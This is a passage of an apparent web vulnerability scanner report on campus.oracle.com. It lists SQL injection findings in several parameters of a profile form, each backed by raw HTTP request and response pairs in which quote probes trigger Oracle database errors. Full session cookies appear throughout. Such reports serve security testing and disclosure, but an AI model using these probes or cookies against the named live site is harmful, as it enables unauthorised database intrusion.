<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"
...[SNIP]...

1.8. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [major parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/us-profile-add-direct.jsp

Issue detail

The major parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the major parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss&phone=xss&email=xss%40oa.com&university=xss&gdate=01%2F01%2F2012&degree=Bachelors&major=xss'&curloc=xss&ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any&position3=xss&Submit=SAVE HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/us-profile-direct.jsp?flag=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e

Response 1

HTTP/1.1 500 Internal Server Error
Date: Mon, 17 Oct 2011 12:45:38 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Content-Length: 2582
Set-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Pragma: no-cache
Cache-Control: no-store
Expires: 0
Connection: close
Content-Type: text/html; charset=UTF-8

<HTML><HEAD><TITLE>500 Internal Server Error</TITLE></HEAD><BODY><H1>500 Internal Server Error</H1><PRE>java.sql.SQLException: ORA-00933: SQL command not properly ended<br>    at oracle.jdbc.driver.Datab
...[SNIP]...

Request 2

GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss&phone=xss&email=xss%40oa.com&university=xss&gdate=01%2F01%2F2012&degree=Bachelors&major=xss''&curloc=xss&ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any&position3=xss&Submit=SAVE HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/us-profile-direct.jsp?flag=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e

Response 2

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:45:38 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Content-Location: http://campus.oracle.com/campus/HR/us-profile-direct.jsp
Set-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Pragma: no-cache
Cache-Control: no-store
Expires: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 28029

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"
...[SNIP]...

1.9. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [phone parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/us-profile-add-direct.jsp

Issue detail

The phone parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the phone parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss&phone=xss'&email=xss%40oa.com&university=xss&gdate=01%2F01%2F2012&degree=Bachelors&major=xss&curloc=xss&ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any&position3=xss&Submit=SAVE HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/us-profile-direct.jsp?flag=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e

Response 1

HTTP/1.1 500 Internal Server Error
Date: Mon, 17 Oct 2011 12:44:51 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Content-Length: 2582
Set-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Pragma: no-cache
Cache-Control: no-store
Expires: 0
Connection: close
Content-Type: text/html; charset=UTF-8

<HTML><HEAD><TITLE>500 Internal Server Error</TITLE></HEAD><BODY><H1>500 Internal Server Error</H1><PRE>java.sql.SQLException: ORA-00933: SQL command not properly ended<br>    at oracle.jdbc.driver.Datab
...[SNIP]...

Request 2

GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss&phone=xss''&email=xss%40oa.com&university=xss&gdate=01%2F01%2F2012&degree=Bachelors&major=xss&curloc=xss&ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any&position3=xss&Submit=SAVE HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/us-profile-direct.jsp?flag=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e

Response 2

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:44:51 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Content-Location: http://campus.oracle.com/campus/HR/us-profile-direct.jsp
Set-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Pragma: no-cache
Cache-Control: no-store
Expires: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 28029

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"
...[SNIP]...

1.10. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [ploc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/us-profile-add-direct.jsp

Issue detail

The ploc parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ploc parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss&phone=xss&email=xss%40oa.com&university=xss&gdate=01%2F01%2F2012&degree=Bachelors&major=xss&curloc=xss&ploc=xss'&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any&position3=xss&Submit=SAVE HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/us-profile-direct.jsp?flag=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e

Response 1

HTTP/1.1 500 Internal Server Error
Date: Mon, 17 Oct 2011 12:45:50 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Content-Length: 2582
Set-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Pragma: no-cache
Cache-Control: no-store
Expires: 0
Connection: close
Content-Type: text/html; charset=UTF-8

<HTML><HEAD><TITLE>500 Internal Server Error</TITLE></HEAD><BODY><H1>500 Internal Server Error</H1><PRE>java.sql.SQLException: ORA-00933: SQL command not properly ended<br>    at oracle.jdbc.driver.Datab
...[SNIP]...

Request 2

GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss&phone=xss&email=xss%40oa.com&university=xss&gdate=01%2F01%2F2012&degree=Bachelors&major=xss&curloc=xss&ploc=xss''&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any&position3=xss&Submit=SAVE HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/us-profile-direct.jsp?flag=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e

Response 2

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:45:50 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Content-Location: http://campus.oracle.com/campus/HR/us-profile-direct.jsp
Set-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Pragma: no-cache
Cache-Control: no-store
Expires: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 28029

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"
...[SNIP]...

1.11. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [position1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/us-profile-add-direct.jsp

Issue detail

The position1 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the position1 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss&phone=xss&email=xss%40oa.com&university=xss&gdate=01%2F01%2F2012&degree=Bachelors&major=xss&curloc=xss&ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA'&position2=Any&position3=xss&Submit=SAVE HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/us-profile-direct.jsp?flag=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e

Response 1

HTTP/1.1 500 Internal Server Error
Date: Mon, 17 Oct 2011 12:45:55 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Content-Length: 2582
Set-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Pragma: no-cache
Cache-Control: no-store
Expires: 0
Connection: close
Content-Type: text/html; charset=UTF-8

<HTML><HEAD><TITLE>500 Internal Server Error</TITLE></HEAD><BODY><H1>500 Internal Server Error</H1><PRE>java.sql.SQLException: ORA-00933: SQL command not properly ended<br>    at oracle.jdbc.driver.Datab
...[SNIP]...

Request 2

GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss&phone=xss&email=xss%40oa.com&university=xss&gdate=01%2F01%2F2012&degree=Bachelors&major=xss&curloc=xss&ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA''&position2=Any&position3=xss&Submit=SAVE HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/us-profile-direct.jsp?flag=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e

Response 2

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:45:56 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Content-Location: http://campus.oracle.com/campus/HR/us-profile-direct.jsp
Set-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Pragma: no-cache
Cache-Control: no-store
Expires: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 28029

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"
...[SNIP]...

1.12. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [position2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/us-profile-add-direct.jsp

Issue detail

The position2 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the position2 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss&phone=xss&email=xss%40oa.com&university=xss&gdate=01%2F01%2F2012&degree=Bachelors&major=xss&curloc=xss&ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any'&position3=xss&Submit=SAVE HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/us-profile-direct.jsp?flag=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e

Response 1

HTTP/1.1 500 Internal Server Error
Date: Mon, 17 Oct 2011 12:46:02 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Content-Length: 2582
Set-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Pragma: no-cache
Cache-Control: no-store
Expires: 0
Connection: close
Content-Type: text/html; charset=UTF-8

<HTML><HEAD><TITLE>500 Internal Server Error</TITLE></HEAD><BODY><H1>500 Internal Server Error</H1><PRE>java.sql.SQLException: ORA-00933: SQL command not properly ended<br>    at oracle.jdbc.driver.Datab
...[SNIP]...

Request 2

GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss&phone=xss&email=xss%40oa.com&university=xss&gdate=01%2F01%2F2012&degree=Bachelors&major=xss&curloc=xss&ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any''&position3=xss&Submit=SAVE HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/us-profile-direct.jsp?flag=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; 